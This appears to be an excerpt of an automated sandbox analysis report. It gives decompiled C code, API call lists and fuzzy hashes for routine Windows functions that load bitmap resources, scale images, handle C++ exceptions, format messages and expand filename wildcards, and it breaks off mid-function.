          			E0020A4F8(void* __edx, void* __fp0) {
          				intOrPtr _v20;
          				intOrPtr _v24;
          				void _v28;
          				void* _t11;
          				void* _t13;
          				signed int _t18;
          				signed int _t19;
          				void* _t21;
          				void* _t22;
          				void* _t26;
          				void* _t32;
          
          				_t32 = __fp0;
          				_t21 = __edx;
          				_t22 = LoadBitmapW( *0x230060, 0x65);
          				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
          				_t28 = _t19;
          				if(_t19 != 0) {
          					_t22 = E0020963A(0x65);
          				}
          				GetObjectW(_t22, 0x18,  &_v28);
          				if(E0020952A(_t28) != 0) {
          					if(_t19 != 0) {
          						_t26 = E0020963A(0x66);
          						if(_t26 != 0) {
          							DeleteObject(_t22);
          							_t22 = _t26;
          						}
          					}
          					_t11 = E0020958C(_v20);
          					_t13 = E0020975D(_t21, _t32, _t22, E00209549(_v24), _t11);
          					DeleteObject(_t22);
          					_t22 = _t13;
          				}
          				return _t22;
          			}

          APIs
          • LoadBitmapW.USER32(00000065), ref: 0020A508
          • GetObjectW.GDI32(00000000,00000018,?), ref: 0020A529
          • DeleteObject.GDI32(00000000), ref: 0020A551
          • DeleteObject.GDI32(00000000), ref: 0020A570
            • Part of subcall function 0020963A: FindResourceW.KERNEL32(00000066,PNG,?,?,0020A54A,00000066), ref: 0020964B
            • Part of subcall function 0020963A: SizeofResource.KERNEL32(00000000,76B95B70,?,?,0020A54A,00000066), ref: 00209663
            • Part of subcall function 0020963A: LoadResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209676
            • Part of subcall function 0020963A: LockResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209681
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
          • String ID:
          • API String ID: 142272564-0
          • Opcode ID: c06b7441c5eabf76d302e93c6ed9ceb48a9a5ed40b55693d226c1540a8fdd100
          • Instruction ID: 8b553398e18f76f002e82e6907ea409be9bc9448bbb301c4f79c5e1f819f68a3
          • Opcode Fuzzy Hash: c06b7441c5eabf76d302e93c6ed9ceb48a9a5ed40b55693d226c1540a8fdd100
          • Instruction Fuzzy Hash: 1601A73295031537C72237B95C5AE7F7B6EEB86B51F890110FA01B71D3EE518C2256A1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 20%
          			E00211A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
          				void* __edi;
          				void* __esi;
          				void* __ebp;
          				void* _t25;
          				void* _t27;
          				void* _t28;
          				intOrPtr _t30;
          				intOrPtr* _t32;
          				void* _t34;
          
          				_t29 = __edx;
          				_t27 = __ebx;
          				_t36 = _a28;
          				_t30 = _a8;
          				if(_a28 != 0) {
          					_push(_a28);
          					_push(_a24);
          					_push(_t30);
          					_push(_a4);
          					E002120D8(__edx, _t36);
          					_t34 = _t34 + 0x10;
          				}
          				_t37 = _a40;
          				_push(_a4);
          				if(_a40 != 0) {
          					_push(_a40);
          				} else {
          					_push(_t30);
          				}
          				E0020F1DB(_t28);
          				_t32 = _a32;
          				_push( *_t32);
          				_push(_a20);
          				_push(_a16);
          				_push(_t30);
          				E002122DA(_t27, _t28, _t29, _t30, _t37);
          				_push(0x100);
          				_push(_a36);
          				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
          				_push( *((intOrPtr*)(_a24 + 0xc)));
          				_push(_a20);
          				_push(_a12);
          				_push(_t30);
          				_push(_a4);
          				_t25 = E00211893(_t29, _t32, _t37);
          				if(_t25 != 0) {
          					E0020F1A9(_t25, _t30);
          					return _t25;
          				}
          				return _t25;
          			}

          APIs
          • ___BuildCatchObject.LIBVCRUNTIME ref: 00211AA0
            • Part of subcall function 002120D8: ___AdjustPointer.LIBCMT ref: 00212122
          • _UnwindNestedFrames.LIBCMT ref: 00211AB7
          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00211AC9
          • CallCatchBlock.LIBVCRUNTIME ref: 00211AED
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
          • String ID:
          • API String ID: 2633735394-0
          • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
          • Instruction ID: 469047e20fd019d627fe1a27587cd0e473e0302969d3da072d6f0038d709bedd
          • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
          • Instruction Fuzzy Hash: 3C01C532410109ABDF129F95CC01EDA7BBAEFA8754F158115FE1865161D372E8B1DFA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E002115E6() {
          				void* _t4;
          				void* _t8;
          
          				E002129B7();
          				E0021294B();
          				if(E0021268E() != 0) {
          					_t4 = E00211726(_t8, __eflags);
          					__eflags = _t4;
          					if(_t4 != 0) {
          						return 1;
          					} else {
          						E002126CA();
          						goto L1;
          					}
          				} else {
          					L1:
          					return 0;
          				}
          			}

          APIs
          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002115E6
          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002115EB
          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002115F0
            • Part of subcall function 0021268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0021269F
          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00211605
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
          • String ID:
          • API String ID: 1761009282-0
          • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
          • Instruction ID: 540bd0fc76ec87da0c026c68929c7b6996b7a223f2bd8052447b9b581fd26dc4
          • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
          • Instruction Fuzzy Hash: 18C00228030683E01C243EB923126ED13C949B27C5B9514D1BA4116197A96608FF1C32
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 51%
          			E0020975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
          				signed int _v0;
          				signed int _v4;
          				void _v68;
          				signed int _v72;
          				signed int _v76;
          				char _v112;
          				intOrPtr _v116;
          				intOrPtr* _v120;
          				short _v122;
          				short _v124;
          				signed int _v128;
          				signed int _v132;
          				signed int _v136;
          				intOrPtr* _v140;
          				char _v144;
          				intOrPtr* _v152;
          				intOrPtr _v156;
          				intOrPtr* _v164;
          				char _v180;
          				intOrPtr* _v184;
          				intOrPtr* _v192;
          				intOrPtr* _v200;
          				intOrPtr* _v212;
          				signed int _v216;
          				signed int _v220;
          				intOrPtr* _v224;
          				char _v228;
          				intOrPtr _v232;
          				void* __edi;
          				signed int _t71;
          				intOrPtr* _t77;
          				void* _t78;
          				intOrPtr* _t79;
          				intOrPtr* _t81;
          				short _t89;
          				intOrPtr* _t93;
          				intOrPtr* _t95;
          				intOrPtr* _t97;
          				intOrPtr* _t101;
          				signed int _t103;
          				intOrPtr* _t111;
          				intOrPtr* _t113;
          				intOrPtr* _t115;
          				signed int _t120;
          				intOrPtr _t124;
          				intOrPtr* _t132;
          				intOrPtr* _t134;
          				void* _t146;
          				void* _t149;
          				signed int _t152;
          				void* _t154;
          				long long* _t155;
          				long long _t158;
          
          				_t158 = __fp0;
          				if(E0020960F() != 0) {
          					_t146 = _a4;
          					GetObjectW(_t146, 0x18,  &_v68);
          					_t152 = _v4;
          					_t120 = _v0;
          					asm("cdq");
          					_t71 = _v72 * _t152 / _v76;
          					if(_t71 < _t120) {
          						_t120 = _t71;
          					}
          					_t149 = 0;
          					_push( &_v112);
          					_push(0x2233ac);
          					_push(1);
          					_push(0);
          					_push(0x22417c);
          					if( *0x22dff4() < 0) {
          						L18:
          						return _t146;
          					} else {
          						_t77 = _v132;
          						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
          						_t79 = _v152;
          						if(_t78 >= 0) {
          							_v144 = 0;
          							_push( &_v144);
          							_push(_t79);
          							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
          								_t81 = _v152;
          								asm("fldz");
          								_push(0);
          								_t124 =  *_t81;
          								_push(_t124);
          								_push(_t124);
          								 *_t155 = _t158;
          								_push(0);
          								_push(0);
          								_push(0x22418c);
          								_push(_v156);
          								_push(_t81);
          								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
          									E0020E920(_t146,  &_v136, 0, 0x2c);
          									_v136 = 0x28;
          									_v132 = _t152;
          									_v120 = 0;
          									_v128 =  ~_t120;
          									_v124 = 1;
          									_t89 = 0x20;
          									_v122 = _t89;
          									_t154 =  *0x22dedc(0,  &_v136, 0,  &_v180, 0, 0);
          									asm("sbb ecx, ecx");
          									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
          										_t132 = _v216;
          										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
          										_t101 = _v120;
          										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
          										_t103 = _v136;
          										_push(_v232);
          										_t134 = _v140;
          										_v220 = _t103;
          										_v228 = 0;
          										_v224 = 0;
          										_v216 = _t120;
          										_push(_t103 * _t120 << 2);
          										_push(_v136 << 2);
          										_push( &_v228);
          										_push(_t134);
          										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
          											DeleteObject(_t154);
          										} else {
          											_t149 = _t154;
          										}
          										_t111 = _v164;
          										 *((intOrPtr*)( *_t111 + 8))(_t111);
          									}
          									_t93 = _v212;
          									 *((intOrPtr*)( *_t93 + 8))(_t93);
          									_t95 = _v212;
          									 *((intOrPtr*)( *_t95 + 8))(_t95);
          									_t97 = _v224;
          									 *((intOrPtr*)( *_t97 + 8))(_t97);
          									if(_t149 != 0) {
          										_t146 = _t149;
          									}
          									goto L18;
          								}
          								_t113 = _v184;
          								 *((intOrPtr*)( *_t113 + 8))(_t113);
          							}
          							_t115 = _v192;
          							 *((intOrPtr*)( *_t115 + 8))(_t115);
          							_t79 = _v200;
          						}
          						 *((intOrPtr*)( *_t79 + 8))(_t79);
          						goto L18;
          					}
          				}
          				_push(_a12);
          				_push(_a8);
          				_push(_a4);
          				return E00209954();
          			}

          APIs
            • Part of subcall function 0020960F: GetDC.USER32(00000000), ref: 00209613
            • Part of subcall function 0020960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0020961E
            • Part of subcall function 0020960F: ReleaseDC.USER32(00000000,00000000), ref: 00209629
          • GetObjectW.GDI32(?,00000018,?,00000000,?,76B95B70), ref: 0020978E
            • Part of subcall function 00209954: GetDC.USER32(00000000), ref: 0020995D
            • Part of subcall function 00209954: GetObjectW.GDI32(?,00000018,?,?,?,76B95B70,?,?,?,?,?,0020977A,?,?,?), ref: 0020998C
            • Part of subcall function 00209954: ReleaseDC.USER32(00000000,?), ref: 00209A20
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ObjectRelease$CapsDevice
          • String ID: (
          • API String ID: 1061551593-3887548279
          • Opcode ID: c8c1e8f39f14be1ab25283bd10a2fe477945997c249f9e544690b460c1005e59
          • Instruction ID: b05911fa2d069546e512c541120f67f9061e80fe77307b475064eadd67417d81
          • Opcode Fuzzy Hash: c8c1e8f39f14be1ab25283bd10a2fe477945997c249f9e544690b460c1005e59
          • Instruction Fuzzy Hash: AD6114B1218305AFD310CFA4D888E6BBBE8FF89704F10491DF59AC7262D671E955CB62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 17%
          			E00200A9F(intOrPtr* __ecx) {
          				char _v516;
          				signed int _t26;
          				void* _t28;
          				void* _t32;
          				signed int _t33;
          				signed int _t34;
          				signed int _t35;
          				signed int _t38;
          				void* _t47;
          				void* _t48;
          
          				_t41 = __ecx;
          				_t44 = __ecx;
          				_t26 =  *(__ecx + 0x48);
          				_t47 = _t26 - 0x6f;
          				if(_t47 > 0) {
          					__eflags = _t26 - 0x7d;
          					if(_t26 == 0x7d) {
          						E0020C339();
          						_t28 = E001FDA42(_t41, 0x96);
          						return E00209735( *0x2375d8, E001FDA42(_t41, 0xc9), _t28, 0);
          					}
          				} else {
          					if(_t47 == 0) {
          						_push(0x456);
          						L38:
          						_push(E001FDA42(_t41));
          						_push( *_t44);
          						L19:
          						_t32 = E0020A57D();
          						L11:
          						return _t32;
          					}
          					_t48 = _t26 - 0x16;
          					if(_t48 > 0) {
          						__eflags = _t26 - 0x38;
          						if(__eflags > 0) {
          							_t33 = _t26 - 0x39;
          							__eflags = _t33;
          							if(_t33 == 0) {
          								_push(0x8c);
          								goto L38;
          							}
          							_t34 = _t33 - 1;
          							__eflags = _t34;
          							if(_t34 == 0) {
          								_push(0x6f);
          								goto L38;
          							}
          							_t35 = _t34 - 1;
          							__eflags = _t35;
          							if(_t35 == 0) {
          								_push( *((intOrPtr*)(__ecx + 4)));
          								_push(0x406);
          								goto L13;
          							}
          							_t38 = _t35 - 9;
          							__eflags = _t38;
          							if(_t38 == 0) {
          								_push(0x343);
          								goto L38;
          							}
          							_t26 = _t38 - 1;
          							__eflags = _t26;
          							if(_t26 == 0) {
          								_push(0x86);
          								goto L38;
          							}
          						} else {
          							if(__eflags == 0) {
          								_push(0x67);
          								goto L38;
          							}
          							_t26 = _t26 - 0x17;
          							__eflags = _t26 - 0xb;
          							if(_t26 <= 0xb) {
          								switch( *((intOrPtr*)(_t26 * 4 +  &M00200D63))) {
          									case 0:
          										_push(0xde);
          										goto L18;
          									case 1:
          										_push(0xe1);
          										goto L18;
          									case 2:
          										_push(0xb4);
          										goto L38;
          									case 3:
          										_push(0x69);
          										goto L38;
          									case 4:
          										_push(0x6a);
          										goto L38;
          									case 5:
          										_push( *((intOrPtr*)(__esi + 4)));
          										_push(0x68);
          										goto L13;
          									case 6:
          										_push(0x46f);
          										goto L38;
          									case 7:
          										_push(0x470);
          										goto L38;
          									case 8:
          										_push( *((intOrPtr*)(__esi + 4)));
          										_push(0x471);
          										goto L13;
          									case 9:
          										goto L61;
          									case 0xa:
          										_push( *((intOrPtr*)(__esi + 4)));
          										_push(0x71);
          										goto L13;
          									case 0xb:
          										E001FDA42(__ecx, 0xc8) =  &_v516;
          										__eax = E001F3E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
          										_push( *((intOrPtr*)(__esi + 8)));
          										__eax =  &_v516;
          										_push( &_v516);
          										return E0020A57D( *__esi, L"%s: %s");
          								}
          							}
          						}
          					} else {
          						if(_t48 == 0) {
          							_push( *__ecx);
          							_push(0xdd);
          							L23:
          							E001FDA42(_t41);
          							L7:
          							_push(0);
          							L8:
          							return E0020A57D();
          						}
          						if(_t26 <= 0x15) {
          							switch( *((intOrPtr*)(_t26 * 4 +  &M00200D0B))) {
          								case 0:
          									_push( *__esi);
          									_push(L"%ls");
          									_push(">");
          									goto L8;
          								case 1:
          									_push( *__ecx);
          									_push(L"%ls");
          									goto L7;
          								case 2:
          									_push(0);
          									__eax = E00209D55();
          									goto L11;
          								case 3:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x7b);
          									goto L13;
          								case 4:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x7a);
          									goto L13;
          								case 5:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x7c);
          									goto L13;
          								case 6:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0xca);
          									goto L13;
          								case 7:
          									_push(0x70);
          									L18:
          									_push(E001FDA42(_t41));
          									_push(0);
          									goto L19;
          								case 8:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x72);
          									goto L13;
          								case 9:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x78);
          									goto L13;
          								case 0xa:
          									_push( *__esi);
          									_push(0x85);
          									goto L23;
          								case 0xb:
          									_push( *__esi);
          									_push(0x204);
          									goto L23;
          								case 0xc:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x84);
          									goto L13;
          								case 0xd:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x83);
          									goto L13;
          								case 0xe:
          									goto L61;
          								case 0xf:
          									_push( *((intOrPtr*)(__esi + 8)));
          									_push( *((intOrPtr*)(__esi + 4)));
          									__eax = E001FDA42(__ecx, 0xd2);
          									return __eax;
          								case 0x10:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0x79);
          									goto L13;
          								case 0x11:
          									_push( *((intOrPtr*)(__esi + 4)));
          									_push(0xdc);
          									L13:
          									_push(E001FDA42(_t41));
          									_push( *_t44);
          									goto L8;
          							}
          						}
          					}
          				}
          				L61:
          				return _t26;
          			}

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _swprintf
          • String ID: %ls$%s: %s
          • API String ID: 589789837-2259941744
          • Opcode ID: 0bb84682f65ddf68dce3c22055d8ef26e12309bf73a8b4ee0ad888fa84282b45
          • Instruction ID: 72a9f202dbd74d23142668f651e4a7b207f2fa3947ba899b3d05f2b38c0b309f
          • Opcode Fuzzy Hash: 0bb84682f65ddf68dce3c22055d8ef26e12309bf73a8b4ee0ad888fa84282b45
          • Instruction Fuzzy Hash: 685126316BC305FAF7201F909DC6F367669AB05B0CFA08506B78A694E3D6E259307A16
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E00219E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
          				intOrPtr _v0;
          				char _v6;
          				char _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int _v20;
          				signed int _v24;
          				signed int _v28;
          				signed int _v36;
          				intOrPtr* _v64;
          				intOrPtr _v96;
          				intOrPtr* _v100;
          				CHAR* _v104;
          				signed int _v116;
          				char _v290;
          				signed int _v291;
          				struct _WIN32_FIND_DATAA _v336;
          				union _FINDEX_INFO_LEVELS _v340;
          				signed int _v344;
          				signed int _v348;
          				intOrPtr _v440;
          				intOrPtr* _t80;
          				signed int _t82;
          				signed int _t87;
          				signed int _t91;
          				signed int _t93;
          				signed int _t95;
          				signed int _t96;
          				signed int _t100;
          				signed int _t103;
          				signed int _t108;
          				signed int _t111;
          				intOrPtr _t113;
          				signed char _t115;
          				union _FINDEX_INFO_LEVELS _t123;
          				signed int _t128;
          				signed int _t131;
          				void* _t136;
          				void* _t138;
          				signed int _t139;
          				signed int _t142;
          				signed int _t144;
          				signed int _t146;
          				signed int* _t147;
          				signed int _t150;
          				void* _t153;
          				CHAR* _t154;
          				char _t157;
          				char _t159;
          				intOrPtr* _t162;
          				void* _t163;
          				intOrPtr* _t164;
          				signed int _t166;
          				void* _t168;
          				intOrPtr* _t169;
          				signed int _t173;
          				signed int _t177;
          				signed int _t178;
          				intOrPtr* _t183;
          				void* _t192;
          				intOrPtr _t193;
          				signed int _t195;
          				signed int _t196;
          				signed int _t198;
          				signed int _t199;
          				signed int _t201;
          				union _FINDEX_INFO_LEVELS _t202;
          				signed int _t207;
          				signed int _t209;
          				signed int _t210;
          				void* _t212;
          				intOrPtr _t213;
          				void* _t214;
          				signed int _t218;
          				void* _t220;
          				signed int _t221;
          				void* _t222;
          				void* _t223;
          				void* _t224;
          				signed int _t225;
          				void* _t226;
          				void* _t227;
          
          				_t80 = _a8;
          				_t223 = _t222 - 0x20;
          				if(_t80 != 0) {
          					_t207 = _a4;
          					_t159 = 0;
          					 *_t80 = 0;
          					_t198 = 0;
          					_t150 = 0;
          					_v36 = 0;
          					_v336.cAlternateFileName = 0;
          					_v28 = 0;
          					__eflags =  *_t207;
          					if( *_t207 == 0) {
          						L9:
          						_v12 = _v12 & 0x00000000;
          						_t82 = _t150 - _t198;
          						_v8 = _t159;
          						_t190 = (_t82 >> 2) + 1;
          						__eflags = _t150 - _t198;
          						_v16 = (_t82 >> 2) + 1;
          						asm("sbb esi, esi");
          						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
          						__eflags = _t209;
          						if(_t209 != 0) {
          							_t196 = _t198;
          							_t157 = _t159;
          							do {
          								_t183 =  *_t196;
          								_t17 = _t183 + 1; // 0x1
          								_v8 = _t17;
          								do {
          									_t142 =  *_t183;
          									_t183 = _t183 + 1;
          									__eflags = _t142;
          								} while (_t142 != 0);
          								_t157 = _t157 + 1 + _t183 - _v8;
          								_t196 = _t196 + 4;
          								_t144 = _v12 + 1;
          								_v12 = _t144;
          								__eflags = _t144 - _t209;
          							} while (_t144 != _t209);
          							_t190 = _v16;
          							_v8 = _t157;
          							_t150 = _v336.cAlternateFileName;
          						}
          						_t210 = E00216F0C(_t190, _v8, 1);
          						_t224 = _t223 + 0xc;
          						__eflags = _t210;
          						if(_t210 != 0) {
          							_t87 = _t210 + _v16 * 4;
          							_v20 = _t87;
          							_t191 = _t87;
          							_v16 = _t87;
          							__eflags = _t198 - _t150;
          							if(_t198 == _t150) {
          								L23:
          								_t199 = 0;
          								__eflags = 0;
          								 *_a8 = _t210;
          								goto L24;
          							} else {
          								_t93 = _t210 - _t198;
          								__eflags = _t93;
          								_v24 = _t93;
          								do {
          									_t162 =  *_t198;
          									_v12 = _t162 + 1;
          									do {
          										_t95 =  *_t162;
          										_t162 = _t162 + 1;
          										__eflags = _t95;
          									} while (_t95 != 0);
          									_t163 = _t162 - _v12;
          									_t35 = _t163 + 1; // 0x1
          									_t96 = _t35;
          									_push(_t96);
          									_v12 = _t96;
          									_t100 = E0021DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
          									_t224 = _t224 + 0x10;
          									__eflags = _t100;
          									if(_t100 != 0) {
          										_push(0);
          										_push(0);
          										_push(0);
          										_push(0);
          										_push(0);
          										E00217DBB();
          										asm("int3");
          										_t220 = _t224;
          										_push(_t163);
          										_t164 = _v64;
          										_t47 = _t164 + 1; // 0x1
          										_t192 = _t47;
          										do {
          											_t103 =  *_t164;
          											_t164 = _t164 + 1;
          											__eflags = _t103;
          										} while (_t103 != 0);
          										_push(_t198);
          										_t201 = _a8;
          										_t166 = _t164 - _t192 + 1;
          										_v12 = _t166;
          										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
          										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
          											_push(_t150);
          											_t50 = _t201 + 1; // 0x1
          											_t153 = _t50 + _t166;
          											_t212 = E00217B1B(_t166, _t153, 1);
          											_t168 = _t210;
          											__eflags = _t201;
          											if(_t201 == 0) {
          												L34:
          												_push(_v12);
          												_t153 = _t153 - _t201;
          												_t108 = E0021DD71(_t168, _t212 + _t201, _t153, _v0);
          												_t225 = _t224 + 0x10;
          												__eflags = _t108;
          												if(__eflags != 0) {
          													goto L37;
          												} else {
          													_t136 = E0021A212(_a12, _t192, __eflags, _t212);
          													E00217A50(0);
          													_t138 = _t136;
          													goto L36;
          												}
          											} else {
          												_push(_t201);
          												_t139 = E0021DD71(_t168, _t212, _t153, _a4);
          												_t225 = _t224 + 0x10;
          												__eflags = _t139;
          												if(_t139 != 0) {
          													L37:
          													_push(0);
          													_push(0);
          													_push(0);
          													_push(0);
          													_push(0);
          													E00217DBB();
          													asm("int3");
          													_push(_t220);
          													_t221 = _t225;
          													_t226 = _t225 - 0x150;
          													_t111 =  *0x22d668; // 0x4319796a
          													_v116 = _t111 ^ _t221;
          													_t169 = _v100;
          													_push(_t153);
          													_t154 = _v104;
          													_push(_t212);
          													_t213 = _v96;
          													_push(_t201);
          													_v440 = _t213;
          													while(1) {
          														__eflags = _t169 - _t154;
          														if(_t169 == _t154) {
          															break;
          														}
          														_t113 =  *_t169;
          														__eflags = _t113 - 0x2f;
          														if(_t113 != 0x2f) {
          															__eflags = _t113 - 0x5c;
          															if(_t113 != 0x5c) {
          																__eflags = _t113 - 0x3a;
          																if(_t113 != 0x3a) {
          																	_t169 = E0021DDC0(_t154, _t169);
          																	continue;
          																}
          															}
          														}
          														break;
          													}
          													_t193 =  *_t169;
          													__eflags = _t193 - 0x3a;
          													if(_t193 != 0x3a) {
          														L47:
          														_t202 = 0;
          														__eflags = _t193 - 0x2f;
          														if(_t193 == 0x2f) {
          															L51:
          															_t115 = 1;
          															__eflags = 1;
          														} else {
          															__eflags = _t193 - 0x5c;
          															if(_t193 == 0x5c) {
          																goto L51;
          															} else {
          																__eflags = _t193 - 0x3a;
          																if(_t193 == 0x3a) {
          																	goto L51;
          																} else {
          																	_t115 = 0;
          																}
          															}
          														}
          														asm("sbb eax, eax");
          														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
          														E0020E920(_t202,  &_v336, _t202, 0x140);
          														_t227 = _t226 + 0xc;
          														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
          														_t123 = _v340;
          														__eflags = _t214 - 0xffffffff;
          														if(_t214 != 0xffffffff) {
          															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
          															__eflags = _t173;
          															_v348 = _t173 >> 2;
          															do {
          																__eflags = _v336.cFileName - 0x2e;
          																if(_v336.cFileName != 0x2e) {
          																	L64:
          																	_push(_t123);
          																	_push(_v344);
          																	_t123 =  &(_v336.cFileName);
          																	_push(_t154);
          																	_push(_t123);
          																	L28();
          																	_t227 = _t227 + 0x10;
          																	__eflags = _t123;
          																	if(_t123 != 0) {
          																		goto L54;
          																	} else {
          																		goto L65;
          																	}
          																} else {
          																	_t177 = _v291;
          																	__eflags = _t177;
          																	if(_t177 == 0) {
          																		goto L65;
          																	} else {
          																		__eflags = _t177 - 0x2e;
          																		if(_t177 != 0x2e) {
          																			goto L64;
          																		} else {
          																			__eflags = _v290;
          																			if(_v290 == 0) {
          																				goto L65;
          																			} else {
          																				goto L64;
          																			}
          																		}
          																	}
          																}
          																goto L58;
          																L65:
          																_t128 = FindNextFileA(_t214,  &_v336);
          																__eflags = _t128;
          																_t123 = _v340;
          															} while (_t128 != 0);
          															_t194 =  *_t123;
          															_t178 = _v348;
          															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
          															__eflags = _t178 - _t131;
          															if(_t178 != _t131) {
          																E00215030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00219E2B);
          															}
          														} else {
          															_push(_t123);
          															_push(_t202);
          															_push(_t202);
          															_push(_t154);
          															L28();
          															L54:
          															_t202 = _t123;
          														}
          														__eflags = _t214 - 0xffffffff;
          														if(_t214 != 0xffffffff) {
          															FindClose(_t214);
          														}
          														_t124 = _t202;
          													} else {
          														_t124 =  &(_t154[1]);
